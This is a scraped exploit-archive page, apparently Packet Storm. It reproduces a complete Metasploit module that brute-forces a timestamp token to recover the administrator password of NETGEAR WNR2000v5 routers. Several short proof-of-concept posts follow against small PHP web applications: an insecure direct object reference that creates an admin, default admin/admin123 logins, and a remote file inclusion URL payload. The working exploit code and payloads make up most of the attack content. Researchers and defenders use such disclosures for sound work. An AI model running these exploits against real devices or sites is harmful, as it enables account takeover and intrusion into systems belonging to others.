The NETGEAR WNR2000 router has a vulnerability in the way it handles password recovery. This vulnerability can be exploited by an unauthenticated attacker who is able to guess the value of a certain timestamp which is in the configuration of the router. Brute forcing the timestamp token might take a few minutes, a few hours, or days, but it is guaranteed that it can be bruteforced. This Metasploit module works very reliably and it has been tested with the WNR2000v5, firmware versions 1.0.0.34 and 1.0.0.18. It should also work with the hardware revisions v4 and v3, but this has not been tested.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'time'class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::CRand  def initialize(info = {})    super(      update_info(        info,        'Name' => 'NETGEAR WNR2000v5 Administrator Password Recovery',        'Description' => %q{          The NETGEAR WNR2000 router has a vulnerability in the way it handles password recovery.          This vulnerability can be exploited by an unauthenticated attacker who is able to guess          the value of a certain timestamp which is in the configuration of the router.          Brute forcing the timestamp token might take a few minutes, a few hours, or days, but          it is guaranteed that it can be bruteforced.          This module works very reliably and it has been tested with the WNR2000v5, firmware versions          1.0.0.34 and 1.0.0.18. It should also work with the hardware revisions v4 and v3, but this          has not been tested.        },        'Author' => [          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2016-10175'],          ['CVE', '2016-10176'],          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear-wnr2000.txt'],          ['URL', 'https://seclists.org/fulldisclosure/2016/Dec/72'],          ['URL', 'https://kb.netgear.com/000036549/Insecure-Remote-Access-and-Command-Execution-Security-Vulnerability']        ],        'DisclosureDate' => '2016-12-20'      )    )    register_options(      [        Opt::RPORT(80)      ]    )    register_advanced_options(      [        OptInt.new('TIME_OFFSET', [true, 'Maximum time differential to try', 5000]),        OptInt.new('TIME_SURPLUS', [true, 'Increase this if you are sure the device is vulnerable and you are not getting through', 200])      ]    )  end  def get_current_time    res = send_request_cgi({      'uri' => '/',      'method' => 'GET'    })    if res && res['Date']      date = res['Date']      return Time.parse(date).strftime('%s').to_i    end  end  # Do some crazyness to force Ruby to cast to a single-precision float and  # back to an integer.  # This emulates the behaviour of the soft-fp library and the float cast  # which is done at the end of Netgear's timestamp generator.  def ieee754_round(number)    [number].pack('f').unpack('f*')[0].to_i  end  # This is the actual algorithm used in the get_timestamp function in  # the Netgear firmware.  def get_timestamp(time)    srandom_r time    t0 = random_r    t1 = 0x17dc65df    hi = (t0 * t1) >> 32    t2 = t0 >> 31    t3 = hi >> 23    t3 -= t2    t4 = t3 * 0x55d4a80    t0 -= t4    t0 += 0x989680    ieee754_round(t0)  end  def get_creds    res = send_request_cgi({      'uri' => '/BRS_netgear_success.html',      'method' => 'GET'    })    if res && res.body =~ /var sn="(\w*)";/      serial = ::Regexp.last_match(1)    else      fail_with(Failure::Unknown, "#{peer} - Failed to obtain serial number, bailing out...")    end    # 1: send serial number    send_request_cgi({      'uri' => '/apply_noauth.cgi',      'query' => '/unauth.cgi',      'method' => 'POST',      'Content-Type' => 'application/x-www-form-urlencoded',      'vars_post' =>      {        'submit_flag' => 'match_sn',        'serial_num' => serial,        'continue' => '+Continue+'      }    })    # 2: send answer to secret questions    send_request_cgi({      'uri' => '/apply_noauth.cgi',      'query' => '/securityquestions.cgi',      'method' => 'POST',      'Content-Type' => 'application/x-www-form-urlencoded',      'vars_post' =>      {        'submit_flag' => 'security_question',        'answer1' => @q1,        'answer2' => @q2,        'continue' => '+Continue+'      }    })    # 3: PROFIT!!!    res = send_request_cgi({      'uri' => '/passwordrecovered.cgi',      'method' => 'GET'    })    if res && res.body =~ %r{Admin Password: (.*)</TD>}      password = ::Regexp.last_match(1)      if password.blank?        fail_with(Failure::Unknown, "#{peer} - Failed to obtain password! Perhaps security questions were already set?")      end    else      fail_with(Failure::Unknown, "#{peer} - Failed to obtain password")    end    if res && res.body =~ %r{Admin Username: (.*)</TD>}      username = ::Regexp.last_match(1)    else      fail_with(Failure::Unknown, "#{peer} - Failed to obtain username")    end    return [username, password]  end  def send_req(timestamp)    query_str = (if timestamp.nil?                   '/PWD_password.htm'                 else                   "/PWD_password.htm%20timestamp=#{timestamp}"                 end)    res = send_request_raw({      'uri' => '/apply_noauth.cgi',      'query' => query_str,      'method' => 'POST',      'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' },      'data' => "submit_flag=passwd&hidden_enable_recovery=1&Apply=Apply&sysOldPasswd=&sysNewPasswd=&sysConfirmPasswd=&enable_recovery=on&question1=1&answer1=#{@q1}&question2=2&answer2=#{@q2}"    })    return res  rescue ::Errno::ETIMEDOUT, ::Errno::ECONNRESET, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e    return  end  def run    # generate the security questions    @q1 = Rex::Text.rand_text_alpha(rand(2..21))    @q2 = Rex::Text.rand_text_alpha(rand(2..21))    # let's try without timestamp first (the timestamp only gets set if the user visited the page before)    print_status("#{peer} - Trying the easy way out first")    res = send_req(nil)    if res && res.code == 200      credentials = get_creds      print_good("#{peer} - Success! Got admin username \"#{credentials[0]}\" and password \"#{credentials[1]}\"")      return    end    # no result? let's just go on and bruteforce the timestamp    print_error("#{peer} - Well that didn't work... let's do it the hard way.")    # get the current date from the router and parse it    end_time = get_current_time    if end_time.nil?      fail_with(Failure::Unknown, "#{peer} - Unable to obtain current time")    end    if end_time <= datastore['TIME_OFFSET']      start_time = 0    else      start_time = end_time - datastore['TIME_OFFSET']    end    end_time += datastore['TIME_SURPLUS']    if end_time < (datastore['TIME_SURPLUS'] * 7.5).to_i      end_time = (datastore['TIME_SURPLUS'] * 7.5).to_i    end    print_good("#{peer} - Got time #{end_time} from router, starting exploitation attempt.")    print_status("#{peer} - Be patient, this might take a long time (typically a few minutes, but it might take hours).")    # work back from the current router time minus datastore['TIME_OFFSET']    loop do      for time in end_time.downto(start_time)        timestamp = get_timestamp(time)        sleep 0.1        if time % 400 == 0          print_status("#{peer} - Still working, trying time #{time}")        end        res = send_req(timestamp)        next unless res && res.code == 200        credentials = get_creds        print_good("#{peer} - Success! Got admin username \"#{credentials[0]}\" and password \"#{credentials[1]}\"")        store_valid_credential(user: credentials[0], private: credentials[1]) # more consistent service_name and protocol, now supplies ip and port        return      end      end_time = start_time      start_time -= datastore['TIME_OFFSET']      if start_time < 0        if end_time <= datastore['TIME_OFFSET']          fail_with(Failure::Unknown, "#{peer} - Exploit failed")        end        start_time = 0      end      print_status("#{peer} - Going for another round, finishing at #{start_time} and starting at #{end_time}")      # let the router clear the buffers a bit...      sleep 30    end  endend

NETGEAR WNR2000v5 Administrator Password Recovery

Online Graduate Tracer System version 1.0.0 suffers from an insecure direct object reference vulnerability.

**Online Graduate Tracer System 1.0.0 Insecure Direct Object Reference**

Posted Aug 29, 2024

Authored by indoushka

Online Graduate Tracer System version 1.0.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 0abd7e5d887d9e2204c565886d418ad0656b2616bb80e508761e6e23aa8bf66f

Download | Favorite | View

**Online Graduate Tracer System 1.0.0 Insecure Direct Object Reference**

    =============================================================================================================================================| # Title     : Online Graduate Tracer System V 1.0.0 IDOR Vulnerability                                                                    || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/tracking.zip                                          |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : leads to the creation of a new admin.[+] use payload : /admin/user_ad.php or /admin/homead.php[+] http://127.0.0.1/tracking/admin/user_ad.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,590)
*   Arbitrary (16,908)
*   BBS (2,859)
*   Bypass (1,880)
*   CGI (1,034)
*   Code Execution (7,844)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,413)
*   DoS (25,127)
*   Encryption (2,389)
*   Exploit (53,324)
*   File Inclusion (4,266)
*   File Upload (1,001)
*   Firewall (822)
*   Info Disclosure (2,893)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (899)
*   Kernel (7,244)
*   Local (14,809)
*   Magazine (587)
*   Overflow (13,180)
*   Perl (1,435)
*   PHP (5,228)
*   Proof of Concept (2,397)
*   Protocol (3,733)
*   Python (1,649)
*   Remote (31,707)
*   Root (3,639)
*   Rootkit (529)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,033)
*   Shell (3,282)
*   Shellcode (1,217)
*   Sniffer (903)
*   Spoof (2,279)
*   SQL Injection (16,630)
*   TCP (2,444)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,027)
*   Web (9,974)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,270)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,110)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,941)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,657)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,783)
*   UNIX (9,443)
*   UnixWare (187)
*   Windows (6,679)
*   Other

Online Graduate Tracer System 1.0.0 Insecure Direct Object Reference

Online Appointment System version 1.0 suffers from an ignored default credential vulnerability.

**Online Appointment System 1.0 Insecure Settings**

Posted Aug 29, 2024

Authored by indoushka

Online Appointment System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | d5e851d5d33d2e7f80f5f84bed4e54f5abf704b307cd6b2d6284ec6e7d940a3c

Download | Favorite | View

**Online Appointment System 1.0 Insecure Settings**

    ====================================================================================================================================| # Title     : Online Appointment System v1.0 Insecure Settings Vulnerability                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.sourcecodester.com/php/14502/online-appointment-system-php-full-source-code-2020.html                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,590)
*   Arbitrary (16,908)
*   BBS (2,859)
*   Bypass (1,880)
*   CGI (1,034)
*   Code Execution (7,844)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,413)
*   DoS (25,127)
*   Encryption (2,389)
*   Exploit (53,324)
*   File Inclusion (4,266)
*   File Upload (1,001)
*   Firewall (822)
*   Info Disclosure (2,893)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (899)
*   Kernel (7,244)
*   Local (14,809)
*   Magazine (587)
*   Overflow (13,180)
*   Perl (1,435)
*   PHP (5,228)
*   Proof of Concept (2,397)
*   Protocol (3,733)
*   Python (1,649)
*   Remote (31,707)
*   Root (3,639)
*   Rootkit (529)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,033)
*   Shell (3,282)
*   Shellcode (1,217)
*   Sniffer (903)
*   Spoof (2,279)
*   SQL Injection (16,630)
*   TCP (2,444)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,027)
*   Web (9,974)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,270)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,110)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,941)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,657)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,783)
*   UNIX (9,443)
*   UnixWare (187)
*   Windows (6,679)
*   Other

Online Appointment System 1.0 Insecure Settings

Multi-Vendor Online Groceries Management System version 1.0 suffers from an ignored default credential vulnerability.

**Multi-Vendor Online Groceries Management System 1.0 Insecure Settings**

Posted Aug 29, 2024

Authored by indoushka

Multi-Vendor Online Groceries Management System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | cd8e33861bcd681954a3b899d067996fd35799bcecc9ac6f0764304867a5ecb8

Download | Favorite | View

**Multi-Vendor Online Groceries Management System 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Multi-Vendor Online Groceries Management System v1.0 Insecure Settings Vulnerability                                        || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,590)
*   Arbitrary (16,908)
*   BBS (2,859)
*   Bypass (1,880)
*   CGI (1,034)
*   Code Execution (7,844)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,413)
*   DoS (25,127)
*   Encryption (2,389)
*   Exploit (53,324)
*   File Inclusion (4,266)
*   File Upload (1,001)
*   Firewall (822)
*   Info Disclosure (2,893)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (899)
*   Kernel (7,244)
*   Local (14,809)
*   Magazine (587)
*   Overflow (13,180)
*   Perl (1,435)
*   PHP (5,228)
*   Proof of Concept (2,397)
*   Protocol (3,733)
*   Python (1,649)
*   Remote (31,707)
*   Root (3,639)
*   Rootkit (529)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,033)
*   Shell (3,282)
*   Shellcode (1,217)
*   Sniffer (903)
*   Spoof (2,279)
*   SQL Injection (16,630)
*   TCP (2,444)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,027)
*   Web (9,974)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,270)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,110)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,941)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,657)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,783)
*   UNIX (9,443)
*   UnixWare (187)
*   Windows (6,679)
*   Other

Multi-Vendor Online Groceries Management System 1.0 Insecure Settings

MSMS-PHP version 1.0 suffers from an ignored default credential vulnerability.

**MSMS-PHP 1.0 Insecure Settings**

Posted Aug 28, 2024

Authored by indoushka

MSMS-PHP version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit, php

SHA-256 | 901a66e3533b07e82bfa171f76797bfe6f506ccd295fb4c073fbbd2ad85576ea

Download | Favorite | View

**MSMS-PHP 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : MSMS-PHP v1.0 Insecure Settings Vulnerability                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,567)
*   Arbitrary (16,906)
*   BBS (2,859)
*   Bypass (1,878)
*   CGI (1,034)
*   Code Execution (7,840)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,412)
*   DoS (25,123)
*   Encryption (2,389)
*   Exploit (53,308)
*   File Inclusion (4,266)
*   File Upload (1,001)
*   Firewall (822)
*   Info Disclosure (2,893)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (899)
*   Kernel (7,242)
*   Local (14,808)
*   Magazine (587)
*   Overflow (13,178)
*   Perl (1,435)
*   PHP (5,227)
*   Proof of Concept (2,396)
*   Protocol (3,731)
*   Python (1,648)
*   Remote (31,704)
*   Root (3,639)
*   Rootkit (528)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,031)
*   Shell (3,281)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,279)
*   SQL Injection (16,629)
*   TCP (2,444)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,023)
*   Web (9,974)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,267)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,110)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,919)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,636)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,782)
*   UNIX (9,441)
*   UnixWare (187)
*   Windows (6,677)
*   Other

MSMS-PHP 1.0 Insecure Settings

Laundry Management System version 1.0 suffers from a remote file inclusion vulnerability.

**Laundry Management System 1.0 Remote File Inclusion**

Posted Aug 28, 2024

Authored by indoushka

Laundry Management System version 1.0 suffers from a remote file inclusion vulnerability.

tags | exploit, remote, code execution, file inclusion

SHA-256 | 8fab3cbba3b63d49ce3f1398516dff725855194afb4b9b834d890bf1ab8dff45

Download | Favorite | View

**Laundry Management System 1.0 Remote File Inclusion**

    =============================================================================================================================================| # Title     : Laundry Management System 1.0 File inclusion Vulnerability                                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.campcodes.com/downloads/online-laundry-management-system-source-code/?wpdmdl=6058&refresh=66bbd3015dcfe1723585281     |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] USe Payload : /index.php?page=http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg[+] http://127.0.0.1/laundry_Management_System/index.php?page=http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpgGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,567)
*   Arbitrary (16,906)
*   BBS (2,859)
*   Bypass (1,878)
*   CGI (1,034)
*   Code Execution (7,840)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,412)
*   DoS (25,123)
*   Encryption (2,389)
*   Exploit (53,308)
*   File Inclusion (4,266)
*   File Upload (1,001)
*   Firewall (822)
*   Info Disclosure (2,893)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (899)
*   Kernel (7,242)
*   Local (14,808)
*   Magazine (587)
*   Overflow (13,178)
*   Perl (1,435)
*   PHP (5,227)
*   Proof of Concept (2,396)
*   Protocol (3,731)
*   Python (1,648)
*   Remote (31,704)
*   Root (3,639)
*   Rootkit (528)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,031)
*   Shell (3,281)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,279)
*   SQL Injection (16,629)
*   TCP (2,444)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,023)
*   Web (9,974)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,267)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,110)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,919)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,636)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,782)
*   UNIX (9,441)
*   UnixWare (187)
*   Windows (6,677)
*   Other

Laundry Management System 1.0 Remote File Inclusion

Medicine Tracker System version 1.0 suffers from an ignored default credential vulnerability.

**Medicine Tracker System 1.0 Insecure Settings**

Posted Aug 27, 2024

Authored by indoushka

Medicine Tracker System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | f581303aa2bf9febcf6dcf7c6c3d3a00468a34461c28597369ee71c12e489cbd

Download | Favorite | View

**Medicine Tracker System 1.0 Insecure Settings**

    ====================================================================================================================================| # Title     : Medicine Tracker System v1.0 Insecure Settings Vulnerability                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-mts_0.zip                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,561)
*   Arbitrary (16,904)
*   BBS (2,859)
*   Bypass (1,878)
*   CGI (1,034)
*   Code Execution (7,838)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,412)
*   DoS (25,122)
*   Encryption (2,389)
*   Exploit (53,299)
*   File Inclusion (4,265)
*   File Upload (1,000)
*   Firewall (822)
*   Info Disclosure (2,893)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (899)
*   Kernel (7,242)
*   Local (14,808)
*   Magazine (587)
*   Overflow (13,178)
*   Perl (1,435)
*   PHP (5,226)
*   Proof of Concept (2,394)
*   Protocol (3,731)
*   Python (1,647)
*   Remote (31,701)
*   Root (3,639)
*   Rootkit (528)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,031)
*   Shell (3,281)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,279)
*   SQL Injection (16,629)
*   TCP (2,444)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,021)
*   Web (9,974)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,267)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,110)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,913)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,631)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,781)
*   UNIX (9,441)
*   UnixWare (187)
*   Windows (6,676)
*   Other

Medicine Tracker System 1.0 Insecure Settings

Medical Hub Directory Site version 1.0 suffers from an ignored default credential vulnerability.

**Medical Hub Directory Site 1.0 Insecure Settings**

Posted Aug 27, 2024

Authored by indoushka

Medical Hub Directory Site version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | a870acea912fa724fa42e52acd620c835225fdc9bee4dbd5bdc81de51ec0acc3

Download | Favorite | View

**Medical Hub Directory Site 1.0 Insecure Settings**

    ====================================================================================================================================| # Title     : Medical Hub Directory Site v1.0 Insecure Settings Vulnerability                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.sourcecodester.com/php/15252/simple-medical-hub-directory-site-phpoop-source-code.html                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,561)
*   Arbitrary (16,904)
*   BBS (2,859)
*   Bypass (1,878)
*   CGI (1,034)
*   Code Execution (7,838)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,412)
*   DoS (25,122)
*   Encryption (2,389)
*   Exploit (53,299)
*   File Inclusion (4,265)
*   File Upload (1,000)
*   Firewall (822)
*   Info Disclosure (2,893)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (899)
*   Kernel (7,242)
*   Local (14,808)
*   Magazine (587)
*   Overflow (13,178)
*   Perl (1,435)
*   PHP (5,226)
*   Proof of Concept (2,394)
*   Protocol (3,731)
*   Python (1,647)
*   Remote (31,701)
*   Root (3,639)
*   Rootkit (528)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,031)
*   Shell (3,281)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,279)
*   SQL Injection (16,629)
*   TCP (2,444)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,021)
*   Web (9,974)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,267)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,110)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,913)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,631)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,781)
*   UNIX (9,441)
*   UnixWare (187)
*   Windows (6,676)
*   Other

Medical Hub Directory Site 1.0 Insecure Settings

Lodging Reservation Management System version 1.0 suffers from an ignored default credential vulnerability.

**Lodging Reservation Management System 1.0 Insecure Settings**

Posted Aug 27, 2024

Authored by indoushka

Lodging Reservation Management System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | feab3739cbf1410f9c44a493d074c6e6d9f127d93f1158c441c2ea24f02fe97f

Download | Favorite | View

**Lodging Reservation Management System 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : LRMS v1.0 Insecure Settings Vulnerability                                                                                   || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/14883/lodging-reservation-management-system-php-free-source-code.html                    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,561)
*   Arbitrary (16,904)
*   BBS (2,859)
*   Bypass (1,878)
*   CGI (1,034)
*   Code Execution (7,838)
*   Conference (691)
